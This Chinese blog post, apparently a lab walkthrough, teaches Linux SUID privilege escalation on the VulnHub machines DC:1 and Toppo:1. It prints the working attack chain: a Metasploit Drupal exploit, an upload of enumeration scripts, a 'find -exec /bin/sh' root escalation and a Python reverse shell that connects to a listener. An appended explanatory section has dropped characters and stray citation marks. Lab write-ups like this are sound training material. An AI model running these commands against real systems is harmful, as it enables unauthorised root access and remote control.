SUID提权

原理

利用参考

SUID (Set owner User ID up on execution)是给予文件的一个特殊类型的文件权限。在Linux/Unix中,当一个程序运行的时候,程序将从登录用户处继承权限。SUID被定义为给予一个用户临时的(程序/文件)所有者的权限来运行一个程序/文件。用户在执行程序/文件/命令的时候,将获取文件所有者的权限以及所有者的UID和GID。

SUDO权限是root把本来只能超级用户执行的命令赋予普通用户执行,系统管理员集中的管理用户使用权限和使用主机,配置文件:/etc/sudoers,除此配置之外的问题,SUDO还有两个CVE漏洞(CVE-2019-14287 CVE-2021-3156)。

suid提权

Linux系统中执行命令:查找(find)、awk、cp..时,用户权限不够的话,又想让搜索结果完整,赋予find一个suid sudo 然后find这个命令也有参数 参数可以执行出其他命令出来 这就造成提权漏洞
find ./ -exec “whoami”\;

1 案例一

web权限→系统权限
环境:DC: 1 ~ VulnHub

项目:LinEnum PEASS-ng

1.1 信息收集

nmap 192.168.2.0/24   #192.168.2.13

1.2 Web漏洞利用

msfconsole

search drupal

use exploit/unix/webapp/drupal_drupalgeddon2 

set rhost 192.168.2.13

run

1.3 suid提权

upload /root/Desktop/tiquan/linux-exploit-suggester.sh /tmp/1.sh  #上传本地检测脚本到对方的tmp目录下
(upload /root/Desktop/tiquan/linpeas.sh /tmp/2.sh   #综合脚本) 

shell       #进入命令

cd /tmp

chmod +x 1.sh   #提升执行权限

./1.sh
/usr/bin/find . -exec '/bin/sh' \;   #开启一个命令终端 执行whoami
whoami    #显示root权限
cd /root
ls
cat thefinalflag.txt

2 案例二

普通用户→系统权限
环境:Toppo: 1 ~ VulnHub

搭建:创建任意虚拟机,然后将toppo.vmdx文件改名并替换原来的vmdx文件

2.1 信息收集

靶场ip 192.168.2.14
靶场设计http://192.168.2.14/admin/notes.txt 泄露密码ted/12345ted123

2.2.1 命令检测

SUID GUID
也可以通过命令进行判定suid和guid
find / -perm -u=s -type f 2>/dev/null

find / -perm -g=s -type f 2>/dev/null


2.2.2 脚本检测

上传LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh # 发现可以用mawk python2.7

2.3 suid提权

利用python2.7能执行代码

nc-lvvp 9999   #kali开启监听9999端口  
通过生成一个python反弹shell提权
/usr/bin/python2.7 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.2.26",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

### SUID方法 当文件设置了SUID位之后,任何运行该程序的用户都会暂时获得拥有者限。这可以被利用来进行操作。为了设置或移除SUID位,可使用`chmod`命令: ```bash chmod u+s filename # 设置SUID位 chmod u-s filename # 移除SUID位 ``` 一旦某个二进制文件具有了SUID限,攻击者可以通过执行此文件来获取更高的限[^2]。 #### 利用SUID进行的具体实例 假设存在一个带有SUID标志的应用程序允许用户修改其行为或参数,则可能成为潜在的安全风险点。例如,如果`/usr/bin/cp`这样的常用工具意外地获得了SUID属性,那么就可以创建恶意脚本并将其复制到受信任的位置从而实现非法访问控制升[^3]。 具体来说,下面是一个不安全的操作案例展示如何滥用这种机制完成过程: ```bash sudo sh -c 'cp $(which cp) .; chmod +s ./cp' ``` 这段代码的作用是从系统的路径中找到真正的`cp`命令位置,并将其副本放置于当前工作目录下;接着赋予新拷贝后的`cp`命令以SUID限。这意味着现在任何人都能以root的身份执行这个本地版本的`cp`指令。 ### CP技巧 对于CP(即copy命令),通常情况下它并不具备直接导致的能力。但是,在某些特殊场景里——比如上述到的情况或是其他形式误配置的情况下——它可以作为辅助手段参与到更复杂的攻击链路之中。特别是当管理员错误地授予了像`cp`这类基本实用程序额外特时,就有可能让普通用户绕过正常的安全限制而达到目的。 需要注意的是,以上描述仅用于教育和技术交流用途,请勿尝试在未经授许可的前下实施此类行动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值